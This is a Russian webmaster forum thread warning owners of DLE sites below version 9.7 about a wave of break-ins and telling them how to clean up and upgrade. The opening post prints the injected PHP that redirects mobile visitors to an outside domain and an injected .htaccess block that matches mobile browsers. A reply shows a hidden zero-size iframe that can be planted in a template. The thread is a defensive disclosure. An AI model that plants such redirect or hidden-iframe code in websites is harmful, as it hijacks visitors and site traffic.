X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Всем владельцам DLE версии ниже 9.7, Повышенная активность хакеров
shansick
shansick
Topic Starter сообщение 26.2.2013, 21:09; Ответить: shansick
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 641
Регистрация: 3.10.2008
Из: Россия
Поблагодарили: 241 раз
Репутация:   42  


Здравствуйте дорогие друзья, если вы владелец сайта или сайтов на CMS DLE версией ниже 9.7 то советую дочитать статью до конца. В последнее время активировались хакеры и через дыра в более ранних версиях DLE начали внедрять вредоносный код, наличие которого неизбежно приведет к спаду всех позиций в ПС Yandex и сведет трафик к 0.

Первая проблема не такая уж и новая, но все же стоит о ней рассказать. Суть заключается в том, что злоумышленник внедряет вредоносный код в следующие файлы движка:
- engine/data/config.php
- engine/data/dbconfig.php
- index.php
- engine/init.php
- .htaccess
- engine.php
- website.lng

Вредоносный код во всех файлах за исключением .htaccess будет иметь следующий вид:
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');


В файле .htaccess будет вписана всего одна строка в конце, просто удалите её. Решение проблемы будет 2:
1. Почистить все вышеперечисленные файлы и установить права записи на них 444, так же заделать дырку в двиге по ссылке тут
2. Просто обновить DLE до версии 9.7 и выше!

Вторая более острая проблема на данный момент - это редирект всего трафика с Yandex черт знает куда. Делается все через ту же злосчастную дыру в двигах, версией ниже 9.7. Тут все делается через 1 файл .htaccess и код редиректа выглядит так:
Развернуть/Свернуть
<IfModule mod_expires.c>
  ExpiresActive On
  ExpiresByType application/javascript "access plus 1 year"
  ExpiresByType text/javascript "access plus 1 year"
  ExpiresByType text/css "access plus 1 year"
  ExpiresByType image/gif "access plus 1 year"
  ExpiresByType image/jpeg "access plus 1 year"
  ExpiresByType image/png "access plus 1 year"
</IfModule>

<IfModule mod_headers.c>
  <FilesMatch .*\.(js|css)$>
    Header set Cache-control: private
  </FilesMatch>
  <FilesMatch .*\.(gif|jpg|png)$>
    Header set Cache-control: public
  </FilesMatch>
</IfModule>

<IfModule mod_setenvif.c>
  BrowserMatch "MSIE" force-no-vary
  BrowserMatch "Mozilla/4.[0-9]{2}" force-no-vary
</IfModule>

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]


Лечится все теме же нехитрыми способами:
1. Почистить все вышеперечисленные файлы и установить права записи на них 444, так же заделать дырку в двиге по ссылке тут
2. Просто обновить DLE до версии 9.7 и выше!

Надеюсь эта информация поможет вам не потерять трафик и не попасться на удочку злоумышленников!


Поблагодарили: (2)
6
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 26.2.2013, 23:30; Ответить: kagtus
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


совсем старый взлом, он начался еще перед новым годом.
на серче в теме об этом "предположительно автор взлома" отписывался, волна этого взлома прошла, остались мелкие отголоски тех кто багфиксы не установил...


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 26.2.2013, 23:41; Ответить: seomasters
Сообщение #3


клоновод
*****

Группа: Banned
Сообщений: 701
Регистрация: 22.9.2011
Из: Россия, Крым
Поблагодарили: 245 раз
Репутация:   62  


kagtus,

Вы не правы! Щас пошла новая волна взломов с более хитрым кодом.


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
phoenix_kys
phoenix_kys
сообщение 26.2.2013, 23:42; Ответить: phoenix_kys
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 1412
Регистрация: 15.5.2009
Поблагодарили: 199 раз
Репутация:   36  


с закрытой регой проблем не было, а так нужно ставить патчи
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MAKAVE
MAKAVE
сообщение 27.2.2013, 1:27; Ответить: MAKAVE
Сообщение #5


Бывалый
****


Группа: User
Сообщений: 250
Регистрация: 11.3.2012
Из: Keratsini, Athens
Поблагодарили: 49 раз
Репутация:   6  


(shansick @ 26.2.2013, 21:09) *
Надеюсь эта информация поможет вам не потерять трафик и не попасться на удочку злоумышленников!

Если качать зануленные версии дле (пиратские, увы таких наверное 90%), да и в придачу со скрытым бэкдором, вы не только, будете сливать траф, но и базу, с пользователями.

Можно и в шаблон засунуть скрипт типа:

<iframe style="width: 0; height: 0" src="http://www.maultalk.com/topic144899.html" frameBorder="0" scrolling="no allowTransparency"></iframe>


Так что разумеется нужно искать, в файлах не только урлы на другие сайт (перед установкой) но и функции типа base64_encode()


--------------------
Качественные сайты без доменов: подробнее
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 27.2.2013, 1:35; Ответить: seomasters
Сообщение #6


клоновод
*****

Группа: Banned
Сообщений: 701
Регистрация: 22.9.2011
Из: Россия, Крым
Поблагодарили: 245 раз
Репутация:   62  


MAKAVE,

Быть умным не всегда полезно! Вирусы есть такие которых даже не найти простому смертному вэбмастеру.


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
moneyfish
moneyfish
сообщение 27.2.2013, 1:39; Ответить: moneyfish
Сообщение #7


Новичок
*

Группа: User
Сообщений: 17
Регистрация: 26.2.2013
Поблагодарили: 3 раза
Репутация:   -11  


патчи это хорошо,но в новых обновлениях тоже часто критические баги вылазят


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 27.2.2013, 12:11; Ответить: kagtus
Сообщение #8


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


seomasters, в чем же???
тема не о новом виде взлома...

P.S. опыт поиска и удаления имеется, отзывы в подписи...

Сообщение отредактировал kagtus - 27.2.2013, 12:17


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 27.2.2013, 12:56; Ответить: seomasters
Сообщение #9


клоновод
*****

Группа: Banned
Сообщений: 701
Регистрация: 22.9.2011
Из: Россия, Крым
Поблагодарили: 245 раз
Репутация:   62  


kagtus,

У нас тоже имеются Клац

Сообщение отредактировал seomasters - 27.2.2013, 12:57


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 27.2.2013, 15:36; Ответить: kagtus
Сообщение #10


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


seomasters, а чего только дле, остальных тоже ломают не меньше...


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
11 Nell 1053 Вчера, 15:21
автор: Nell
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
277 kaartes 102492 7.12.2017, 9:55
автор: Tootkin
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
142 contex1 64992 5.12.2017, 12:13
автор: contex1
Открытая тема (нет новых ответов) Mobalfa.com - web и wap подписки по РФ и СНГ! Выгодно лить в одну ПП! Высокие ставки всем!
5 Mobаlfa 1117 4.12.2017, 11:02
автор: Mobаlfa
Открытая тема (нет новых ответов) Требуется так сказать оптимизация шаблона DLE
5 Deadman_n 392 2.12.2017, 13:24
автор: Deadman_n


 



RSS Текстовая версия Сейчас: 12.12.2017, 5:18
Дизайн